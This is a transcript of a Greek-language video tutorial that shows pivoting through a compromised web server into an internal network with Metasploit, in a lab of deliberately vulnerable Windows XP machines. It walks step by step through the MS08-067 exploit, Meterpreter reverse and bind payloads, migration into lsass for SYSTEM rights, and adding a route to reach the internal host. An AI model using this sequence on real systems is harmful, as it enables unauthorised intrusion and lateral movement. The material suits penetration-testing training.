Καλησπέρα φίλοι μου, σε αυτό το βίντεο θα δούμε πώς να κάνουμε pivoting σε ένα intranet δίκτυο μέσω του Metasploit. Αρχικά, τι εννοούμε με τον όρο pivoting και intranet δίκτυο? Με τον όρο pivoting εννοούμε την μεταφορά από ένα σύστημα σε ένα άλλο. Να το εξηγήσω λίγο καλύτερα. Όταν έχουμε δηλαδή πρόσβαση σε ένα δίκτυο, σε ένα σύστημα ενός δικτύου, και θέλουμε να μεταφερθούμε από το ένα σύστημα στο άλλο, αυτή η διαδικασία ονομάζεται pivoting. Intranet δίκτυο είναι ένα δίκτυο το οποίο βρίσκεται συνήθως πίσω από ένα firewall και επικοινωνεί μόνο locally. Δεν έχει επικοινωνία δηλαδή με τον εισαγωγικά έξω κόσμο. Και για να το καταλάβετε λίγο καλύτερα, έχω φτιάξει ένα, ας το πούμε, σχεδιάγραμμα. Λοιπόν, εδώ έχουμε τον επιτιθέμενο. Αυτός εδώ είναι ο σερβερ μας, στον οποίο υπάρχει εξωτερική Wide Area Network και εσωτερική LAN Area Network IP. Η εξωτερική του IP είναι 192.168.2.8 και η εσωτερική του IP είναι 161.162.163.101. Ο σερβερ μας είναι εκτός του firewall. Εδώ υπάρχει ένα firewall και πίσω από το firewall υπάρχουν δύο συστήματα. Αυτά τα δύο συστήματα δημιουργούν αυτό που λέμε intranet δίκτυο. Αυτά τα δύο συστήματα λοιπόν έχουν μόνο εσωτερική IP. Μπορούν να επικοινωνήσουν μεταξύ τους και με τον server. Δεν μπορούν αυτά τα δύο συστήματα να επικοινωνήσουν με τον επιτιθέμενο. Ο τρόπος για να πάρουμε πρόσβαση σε αυτά τα δύο συστήματα είναι αρχικά ο επιτιθέμενος. Μισό λεπτάκι. Είναι αρχικά ο επιτιθέμενος να... Γιατί δεν γράφει. Okay. Τώρα επειδή δεν το γνωρίζω και πολύ καλά το GIMP, θα το δούμε. Ο τρόπος για να πάρει πρόσβαση επιτιθέμενος στο δίκτυο είναι να πάρει αρχικά πρόσβαση στον server, από εδώ δηλαδή να περάσει στο server, και από τον server να περάσει είτε στο ένα σύστημα είτε στο άλλο. Και ύστερα, αφού πάρει πρόσβαση σε ένα από τα εσωτερικά συστήματα, μπορεί να πηδήξει από το ένα στο άλλο. Η διαδικασία της μεταφοράς από το server στο εσωτερικό ονομάζεται pivoting, καθώς και από το ένα σύστημα στο άλλο. Αυτή η διαδικασία, όπως είπαμε, ονομάζεται pivoting. Πάμε λίγο να το δούμε και πιο πρακτικά. Αυτός εδώ είναι ο web server μας. Όπως θα δείτε, στο web server έχουν δοθεί δύο IP. Η μία είναι 192.168.2.8, η οποία υποτίθεται ότι είναι η εξωτερική του IP, και η άλλη IP είναι 161.162.163.101, η οποία υποτίθεται ότι είναι η εσωτερική του IP. Εδώ υπάρχει το πρώτο σύστημα του δικτύου, στο οποίο, όπως βλέπετε, υπάρχει μόνο μία IP. Είναι 161.162.163.102. Είναι η μοναδική IP που υπάρχει σε αυτό το σύστημα και το συγκεκριμένο σύστημα δεν μπορεί να επικοινωνήσει με τον έξω κόσμο. Για παράδειγμα,
Ωραία. Η IP του Google είναι αυτή εδώ. Πάμε λοιπόν εδώ στο σύστημα που έχει μόνο local IP να κάνουμε ένα ping το Google. Βλέπω ότι μας λέει destination host unreachable. Οπότε επιβεβαιώσαμε ότι δεν μπορεί να επικοινωνήσει με τον έξω κόσμο. Από την άλλη, ping 161, 162, 163, 101, που είναι η εσωτερική IP του web server, βλέπετε ότι κάνει κανονικά ping. Λοιπόν, πάμε να δούμε λοιπόν τώρα πώς θα κάνουμε το pivoting. Πώς λειτουργεί το pivoting μέσω του Metasploit. Αρχικά θέλουμε να τρέξουμε το Metasploit, θα ανοίξουμε τα προαπαιτούμενα services που θέλει. Και τρέχουμε το Metasploit. Με το DB status βλέπουμε αν έχει συνδεθεί το Metasploit με την Postgres database. Και τα δύο συστήματα που σας έδειξα, και ο web server και το εσωτερικό σύστημα, είναι Windows XP Service Pack 2. Τα οποία έχω προσθέσει εγώ κάποια services ώστε να έχουν κάποιες παραπάνω ευπάθειες, περισσότερο για λόγους εκπαιδευτικούς και για διάφορα τεστ. Μπορείτε τα δύο αυτά συστήματα να τα κατεβάσετε από το forum, το Greek Hacker Forum. Vulnerable Windows είναι το θέμα που έχει μέσα το σύστημα. Αυτές εδώ είναι οι ευπάθειές του. Όποιος κατεβάσει το συγκεκριμένο σύστημα και θέλει να το χρησιμοποιήσει, την πρώτη φορά που θα το λειτουργήσει θα πρέπει να ανοίξει, να ενεργοποιήσει την SQL Database και τον VNC Server. Λοιπόν, ένα από τα πιο γνωστά exploit για τα Windows XP Service Pack 2 είναι το NetAPI, MSO8 κάτω παύλα 067. Use λοιπόν exploit Windows SMB MSO8 κάτω παύλα 067 NetAPI. Με το Show Options θα δούμε τι μας ζητάει το συγκεκριμένο exploit. Όπως βλέπουμε, το μόνο που μας ζητάει είναι η remote IP, η IP δηλαδή του στόχου μας. Στην προκειμένη περίπτωση είναι ο web server 192.168.2.8 set rhost 192.168.2.8. Set payload, θέλουμε να φορτώσουμε ένα payload Windows Meterpreter Reverse TCP. Το Reverse TCP μπορεί να είναι οτιδήποτε, μπορεί να είναι Bind TCP, μπορεί να είναι Reverse HTTP, οτιδήποτε. Show Options. Θέλουμε λοιπόν, όπως βλέπετε από το exploit μας, όλες οι παράμετροι είναι σεταρισμένες. Από το payload όμως λείπει
το L-host. L-host είναι η IP στην οποία θα επιστρέψει το reverse connection. Set L-host 192.168.2.4. Όπως βλέπετε, δεν έχω θέσει καμία πόρτα, διότι όλη η διαδικασία γίνεται locally, γίνεται σε εισαγωγικά εντός δικτύου. Το μόνο που βρίσκεται εκτός δικτύου αυτή τη στιγμή είναι αυτό εδώ το σύστημα. Λοιπόν, show options, να δούμε ότι όλα είναι σεταρισμένα. Όπως βλέπετε, όλα είναι κομπλέ. Και exploit. Λογικά, αν όλα δουλέψουν σωστά, θα μας δώσει ένα meter per SSL. Και καλώς ήρθε. Έχουμε meter per SSL. Το πρώτο πράγμα που θέλουμε να κάνουμε όταν έχουμε ένα meter per SSL είναι migrate σε κάποιο service του συστήματος. Ο λόγος είναι γιατί απλά, εάν έχουμε κάνει κάποιο exploit π.χ. στο web browser του συστήματος, εάν το θύμα μας κλείσει το web browser, χάνουμε το session. Με την εντολή PS λοιπόν βλέπουμε τα services που τρέχουν στο σύστημα. Μπορεί να έχετε δει σε άλλα βίντεο να κάνουν migrate στο explorer.exe, σε αυτό εδώ. Εγώ προσωπικά δεν το συστήνω, αρχικά γιατί όπως βλέπετε τα δικαιώματα είναι δικαιώματα χρήστη. Εγώ χρησιμοποιώ το service Elsass, το οποίο έχει δικαιώματα συστήματος. Αυτό είναι καθαρά δικιά σας, στη δικιά σας κρίση. Εγώ απλά συνιστώ καλύτερα σε μια εφαρμογή με δικαιώματα συστήματος παρά σε ένα service, με συγχωρείτε, με δικαιώματα συστήματος παρά σε ένα service με δικαιώματα χρήστη. Λοιπόν, έχουμε κάνει migrate. Τώρα αυτό που θέλουμε είναι να δούμε το εσωτερικό του δικτύου. Route. Βλέπουμε λοιπόν με την εντολή route τα δίκτυα τα οποία είναι συνδεδεμένα με το συγκεκριμένο σύστημα. Βλέπουμε ότι συνδέεται με ένα δίκτυο 161.162.163.0 και με ένα δίκτυο 192.168.2.0. Γνωρίζουμε ότι αυτό εδώ είναι το δίκτυο το οποίο έχει πάρει την εξωτερική του IP, αυτή είναι εδώ, και αυτό εδώ είναι το δίκτυο το εσωτερικό. Κάτι άλλο που θα μπορούσαμε είναι να κάνουμε μάλλον όχι, ας το κάνουμε έτσι, 161.162.163.0 ÷ 24. Όπως βλέπετε, έχουμε τα συστήματα που βρίσκονται στο εσωτερικό του δικτύου. Αυτός εδώ, με συγχωρείτε, είναι ο server. Το Windows XP που λειτουργεί σαν τον server μας. Και αυτό εδώ είναι το σύστημα που θέλουμε να κάνουμε pivoting. Θα βάλουμε αυτό το session στο background. Πολύ ωραία. Και τώρα, για να κάνουμε pivoting, χρησιμοποιούμε την εντολή add. Όχι, με συγχωρείτε. Route add. Την IP του συστήματος που θέλουμε να κάνουμε pivoting, του τελικού συστήματος, δηλαδή 161.162.163.102, την netmask 255.255.255.0, και τέλος το session από το οποίο θα κάνουμε pivoting. Session 1 στην προκειμένη περίπτωση. Και πατάμε Enter. Επίσης, θέλουμε να αλλάξουμε το remote host στην IP του συστήματος που κάνουμε pivoting. Πολύ ωραία. Και θέλουμε να αλλάξουμε την L-port. Ακόμα και στην προκειμένη περίπτωση πάλι δεν υπάρχει πρόβλημα να την αλλάξω. Αλλά
στο εξωτερικό δίκτυο, σε μια επίθεση στο εξωτερικό δίκτυο, θα πρέπει στο pivoting, σε κάθε pivoting που κάνετε, να αλλάζετε την πόρτα στην οποία θα έρθει το connection. Αυτό γίνεται πολύ απλά για να μην έχουμε σε εισαγωγικά προβλήματα, όλο το traffic να έρχεται από την ίδια πόρτα, ίσως να μην λειτουργήσει σωστά. Set L-port 4445. Set L-host 192.168.2.4. Α, το έχει ήδη, δεν πειράζει. Και νομίζω ότι είμαστε έτοιμοι. Show options. Έχουμε remote host το 102, local host το 24 με διαφορετική πόρτα. Ας κάνουμε exploit. Δεν θα δουλέψει. Ωραία. Set payload. Windows meter printer. Bind TCP. Show options. Set L-host 192.168.2.4. Exploit. Ωραία, πολύ ωραία, δούλεψε. Και όπως βλέπετε, έχουμε το meter printer session 2. Έλα. Ναι, οκ. Okay. Είμαι στο meter printer και προσπαθώ να δω τα session. Όπως βλέπετε, έχουμε το session 1, το οποίο είναι στην IP 192.168.2.8, και το session 2 που είναι στην IP 161.162.163.102. Από τη μία IP έχουμε πάρει πρόσβαση στην άλλη IP. Αυτό ήταν ο οδηγός μου όσο αφορά το pivoting. Ελπίζω να σας βοήθησε. Θα τα πούμε σύντομα στον επόμενο οδηγό μου.